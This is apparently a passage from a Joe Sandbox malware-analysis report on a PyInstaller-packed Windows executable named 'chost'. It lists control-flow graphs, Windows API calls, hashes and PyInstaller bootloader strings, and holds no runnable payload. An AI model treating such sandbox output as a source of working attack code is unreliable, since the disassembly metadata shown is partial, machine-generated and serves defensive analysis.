7ff694368b30 call 7ff694368bd0 call 7ff694366fb0 call 7ff694366d60 call 7ff694368ad0 258->269 270 7ff694363f41-7ff694363f5e PostMessageW GetMessageW 258->270 263->237 264->263 268 7ff694363e4e-7ff694363e54 264->268 272 7ff694363e56-7ff694363e58 268->272 273 7ff694363e5f-7ff694363e61 268->273 308 7ff694363fa5-7ff694363fa7 269->308 270->269 276 7ff694363e5a 272->276 277 7ff694363e67-7ff694363e83 call 7ff694366db0 call 7ff694367330 272->277 273->237 273->277 276->237 289 7ff694363e85-7ff694363e8c 277->289 290 7ff694363e8e-7ff694363e95 277->290 292 7ff694363edb-7ff694363ef0 call 7ff694362a50 call 7ff694366fb0 call 7ff694366d60 289->292 293 7ff694363e97-7ff694363ea4 call 7ff694366df0 290->293 294 7ff694363eaf-7ff694363eb9 call 7ff6943671a0 290->294 292->237 293->294 305 7ff694363ea6-7ff694363ead 293->305 306 7ff694363ebb-7ff694363ec2 294->306 307 7ff694363ec4-7ff694363ed2 call 7ff6943674e0 294->307 305->292 306->292 307->237 317 7ff694363ed4 307->317 311 7ff694363fe9-7ff694363ff7 call 7ff694361900 308->311 312 7ff694363fa9-7ff694363fb3 call 7ff694369200 308->312 311->222 312->311 321 7ff694363fb5-7ff694363fca 312->321 317->292 322 7ff694363fcc-7ff694363fdf call 7ff694362710 call 7ff694361900 321->322 323 7ff694363fe4 call 7ff694362a50 321->323 322->222 323->311
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                        • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                        • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                        • Opcode ID: b3b5a56992daf9903ed9efec52e2e31294b1e992dc7436ca3323256ab31d685a
                                                                                                                                                                                                                                        • Instruction ID: 6d5ec9cbab3b320319b505cf61f02d885338274f5c20f9d9196418b22e6e0cf8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3b5a56992daf9903ed9efec52e2e31294b1e992dc7436ca3323256ab31d685a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11326C21A0C68791FA399B3294D62B976A1EF45784F84C0BEDA5DC36D6EF2CE564C300

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 536 7ff6943869d4-7ff694386a47 call 7ff694386708 539 7ff694386a49-7ff694386a52 call 7ff694374f58 536->539 540 7ff694386a61-7ff694386a6b call 7ff694378590 536->540 545 7ff694386a55-7ff694386a5c call 7ff694374f78 539->545 546 7ff694386a6d-7ff694386a84 call 7ff694374f58 call 7ff694374f78 540->546 547 7ff694386a86-7ff694386aef CreateFileW 540->547 560 7ff694386da2-7ff694386dc2 545->560 546->545 550 7ff694386b6c-7ff694386b77 GetFileType 547->550 551 7ff694386af1-7ff694386af7 547->551 553 7ff694386bca-7ff694386bd1 550->553 554 7ff694386b79-7ff694386bb4 GetLastError call 7ff694374eec CloseHandle 550->554 556 7ff694386b39-7ff694386b67 GetLastError call 7ff694374eec 551->556 557 7ff694386af9-7ff694386afd 551->557 563 7ff694386bd9-7ff694386bdc 553->563 564 7ff694386bd3-7ff694386bd7 553->564 554->545 571 7ff694386bba-7ff694386bc5 call 7ff694374f78 554->571 556->545 557->556 558 7ff694386aff-7ff694386b37 CreateFileW 557->558 558->550 558->556 568 7ff694386be2-7ff694386c37 call 7ff6943784a8 563->568 569 7ff694386bde 563->569 564->568 574 7ff694386c39-7ff694386c45 call 7ff694386910 568->574 575 7ff694386c56-7ff694386c87 call 7ff694386488 568->575 569->568 571->545 574->575 581 7ff694386c47 574->581 582 7ff694386c8d-7ff694386ccf 575->582 583 7ff694386c89-7ff694386c8b 575->583 584 7ff694386c49-7ff694386c51 call 7ff69437ab30 581->584 585 7ff694386cf1-7ff694386cfc 582->585 586 7ff694386cd1-7ff694386cd5 582->586 583->584 584->560 587 7ff694386d02-7ff694386d06 585->587 588 7ff694386da0 585->588 586->585 590 7ff694386cd7-7ff694386cec 586->590 587->588 591 7ff694386d0c-7ff694386d51 CloseHandle CreateFileW 587->591 588->560 590->585 593 7ff694386d86-7ff694386d9b 591->593 594 7ff694386d53-7ff694386d81 GetLastError call 7ff694374eec call 7ff6943786d0 591->594 593->588 594->593
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1617910340-0
                                                                                                                                                                                                                                        • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                        • Instruction ID: 163e34ad10565bb3fe615f7e3a34a4ef17550527bb3377863564f117c90b8a52
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80C1A236B28A4285EB20CFB6C4906AC7771F749BA8B119269DE2ED77D4CF38E455C300

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FindFirstFileW.KERNELBASE(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF69436841B
                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF69436849E
                                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF6943684BD
                                                                                                                                                                                                                                        • FindNextFileW.KERNELBASE(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF6943684CB
                                                                                                                                                                                                                                        • FindClose.KERNEL32(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF6943684DC
                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNELBASE(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF6943684E5
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                        • String ID: %s\*
                                                                                                                                                                                                                                        • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                        • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                        • Instruction ID: f54adb1723f03b9f80fca2c002b245018af0083a498a69ff525712df6ff72109
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9341B221A0D94381EA359B36E4C52B97360FB98758F90837AE99DC36D8DF3CD54AC700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                                                                                                        • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                        • Instruction ID: 2e410cf13851aeba81fe7b4c3396e602905b6641dc6c9ffad5377d03b7e6117a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6DF04432A1864286F7708F76B4D976A7350EB84764F148279DAAD866D4EF3CD059CB00
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1010374628-0
                                                                                                                                                                                                                                        • Opcode ID: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
                                                                                                                                                                                                                                        • Instruction ID: 6fc1c0461378264d24db912c73872cf31cdc2197647f0bb5e75080b7222b2bdd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED02B121A1D64690FE75AB33A5C1279A6A0EF45BA4F46C6BCED9DC63D2DE3CE411C300

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 329 7ff694361950-7ff69436198b call 7ff6943645b0 332 7ff694361c4e-7ff694361c72 call 7ff69436c5c0 329->332 333 7ff694361991-7ff6943619d1 call 7ff694367f80 329->333 338 7ff694361c3b-7ff694361c3e call 7ff6943700bc 333->338 339 7ff6943619d7-7ff6943619e7 call 7ff694370744 333->339 343 7ff694361c43-7ff694361c4b 338->343 344 7ff6943619e9-7ff694361a03 call 7ff694374f78 call 7ff694362910 339->344 345 7ff694361a08-7ff694361a24 call 7ff69437040c 339->345 343->332 344->338 350 7ff694361a26-7ff694361a40 call 7ff694374f78 call 7ff694362910 345->350 351 7ff694361a45-7ff694361a5a call 7ff694374f98 345->351 350->338 359 7ff694361a7b-7ff694361afc call 7ff694361c80 * 2 call 7ff694370744 351->359 360 7ff694361a5c-7ff694361a76 call 7ff694374f78 call 7ff694362910 351->360 371 7ff694361b01-7ff694361b14 call 7ff694374fb4 359->371 360->338 374 7ff694361b16-7ff694361b30 call 7ff694374f78 call 7ff694362910 371->374 375 7ff694361b35-7ff694361b4e call 7ff69437040c 371->375 374->338 380 7ff694361b6f-7ff694361b8b call 7ff694370180 375->380 381 7ff694361b50-7ff694361b6a call 7ff694374f78 call 7ff694362910 375->381 389 7ff694361b8d-7ff694361b99 call 7ff694362710 380->389 390 7ff694361b9e-7ff694361bac 380->390 381->338 389->338 390->338 393 7ff694361bb2-7ff694361bb9 390->393 395 7ff694361bc1-7ff694361bc7 393->395 396 7ff694361bc9-7ff694361bd6 395->396 397 7ff694361be0-7ff694361bef 395->397 398 7ff694361bf1-7ff694361bfa 396->398 397->397 397->398 399 7ff694361bfc-7ff694361bff 398->399 400 7ff694361c0f 398->400 399->400 401 7ff694361c01-7ff694361c04 399->401 402 7ff694361c11-7ff694361c24 400->402 401->400 403 7ff694361c06-7ff694361c09 401->403 404 7ff694361c2d-7ff694361c39 402->404 405 7ff694361c26 402->405 403->400 406 7ff694361c0b-7ff694361c0d 403->406 404->338 404->395 405->404 406->402
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694367F80: _fread_nolock.LIBCMT ref: 00007FF69436802A
                                                                                                                                                                                                                                        • _fread_nolock.LIBCMT ref: 00007FF694361A1B
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694362910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF694361B6A), ref: 00007FF69436295E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                        • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                        • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                        • Opcode ID: d522766856f946b06e70a868bf79752b85045892f8132ee412cafe079733bd22
                                                                                                                                                                                                                                        • Instruction ID: ec4b37d6c3ea0c03a9ced62c6e4a9f40e4ed2a7e83b8c715eb7a5da5b5a35b35
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d522766856f946b06e70a868bf79752b85045892f8132ee412cafe079733bd22
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D815B71A0CA8786EB709B36D0C62AD73A0EB48784F44C4B9E98DC7796DE3CE545CB40

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 407 7ff694361600-7ff694361611 408 7ff694361637-7ff694361651 call 7ff6943645b0 407->408 409 7ff694361613-7ff69436161c call 7ff694361050 407->409 416 7ff694361653-7ff694361681 call 7ff694374f78 call 7ff694362910 408->416 417 7ff694361682-7ff69436169c call 7ff6943645b0 408->417 414 7ff69436162e-7ff694361636 409->414 415 7ff69436161e-7ff694361629 call 7ff694362710 409->415 415->414 424 7ff6943616b8-7ff6943616cf call 7ff694370744 417->424 425 7ff69436169e-7ff6943616b3 call 7ff694362710 417->425 432 7ff6943616f9-7ff6943616fd 424->432 433 7ff6943616d1-7ff6943616f4 call 7ff694374f78 call 7ff694362910 424->433 431 7ff694361821-7ff694361824 call 7ff6943700bc 425->431 438 7ff694361829-7ff69436183b 431->438 436 7ff694361717-7ff694361737 call 7ff694374fb4 432->436 437 7ff6943616ff-7ff69436170b call 7ff694361210 432->437 448 7ff694361819-7ff69436181c call 7ff6943700bc 433->448 445 7ff694361739-7ff69436175c call 7ff694374f78 call 7ff694362910 436->445 446 7ff694361761-7ff69436176c 436->446 444 7ff694361710-7ff694361712 437->444 444->448 461 7ff69436180f-7ff694361814 445->461 450 7ff694361802-7ff69436180a call 7ff694374fa0 446->450 451 7ff694361772-7ff694361777 446->451 448->431 450->461 454 7ff694361780-7ff6943617a2 call 7ff69437040c 451->454 462 7ff6943617da-7ff6943617e6 call 7ff694374f78 454->462 463 7ff6943617a4-7ff6943617bc call 7ff694370b4c 454->463 461->448 468 7ff6943617ed-7ff6943617f8 call 7ff694362910 462->468 469 7ff6943617c5-7ff6943617d8 call 7ff694374f78 463->469 470 7ff6943617be-7ff6943617c1 463->470 474 7ff6943617fd 468->474 469->468 470->454 473 7ff6943617c3 470->473 473->474 474->450
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                        • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                        • Opcode ID: 3c0774a10d9180a9ef9e621267a67a956cc1251727fd489e11b34b92f8f2baae
                                                                                                                                                                                                                                        • Instruction ID: 9a114c3843bf75e5076c0475f8d657baff8be09ddb9392e7641fcb66bdde48c1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c0774a10d9180a9ef9e621267a67a956cc1251727fd489e11b34b92f8f2baae
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7518C21B0864792EA30AB33A4821A973A0FF84798F84C5B9EE4CC7796DE3CF555C740

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(?,?,00000000,00007FF694363CBB), ref: 00007FF6943688F4
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00007FF694363CBB), ref: 00007FF6943688FA
                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00007FF694363CBB), ref: 00007FF69436893C
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694368A20: GetEnvironmentVariableW.KERNEL32(00007FF69436388E), ref: 00007FF694368A57
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694368A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF694368A79
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6943782A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6943782C1
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694362810: MessageBoxW.USER32 ref: 00007FF6943628EA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                        • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                        • Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                                        • Instruction ID: aef251a8b39d2586d2fea0c913fb3acc5570be9425b6667555f62ba95da060a3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54417121B1D64381EA38AB37A8D62B96291EF89B84F40C179ED4DC7796DE3CE504C301

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 599 7ff694361210-7ff69436126d call 7ff69436bdf0 602 7ff694361297-7ff6943612af call 7ff694374fb4 599->602 603 7ff69436126f-7ff694361296 call 7ff694362710 599->603 608 7ff6943612d4-7ff6943612e4 call 7ff694374fb4 602->608 609 7ff6943612b1-7ff6943612cf call 7ff694374f78 call 7ff694362910 602->609 615 7ff6943612e6-7ff694361304 call 7ff694374f78 call 7ff694362910 608->615 616 7ff694361309-7ff69436131b 608->616 621 7ff694361439-7ff69436144e call 7ff69436bad0 call 7ff694374fa0 * 2 609->621 615->621 617 7ff694361320-7ff694361345 call 7ff69437040c 616->617 627 7ff69436134b-7ff694361355 call 7ff694370180 617->627 628 7ff694361431 617->628 636 7ff694361453-7ff69436146d 621->636 627->628 635 7ff69436135b-7ff694361367 627->635 628->621 637 7ff694361370-7ff694361398 call 7ff69436a230 635->637 640 7ff69436139a-7ff69436139d 637->640 641 7ff694361416-7ff69436142c call 7ff694362710 637->641 642 7ff69436139f-7ff6943613a9 640->642 643 7ff694361411 640->643 641->628 645 7ff6943613ab-7ff6943613b9 call 7ff694370b4c 642->645 646 7ff6943613d4-7ff6943613d7 642->646 643->641 652 7ff6943613be-7ff6943613c1 645->652 647 7ff6943613ea-7ff6943613ef 646->647 648 7ff6943613d9-7ff6943613e7 call 7ff694389ea0 646->648 647->637 651 7ff6943613f5-7ff6943613f8 647->651 648->647 654 7ff6943613fa-7ff6943613fd 651->654 655 7ff69436140c-7ff69436140f 651->655 656 7ff6943613c3-7ff6943613cd call 7ff694370180 652->656 657 7ff6943613cf-7ff6943613d2 652->657 654->641 659 7ff6943613ff-7ff694361407 654->659 655->628 656->647 656->657 657->641 659->617
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
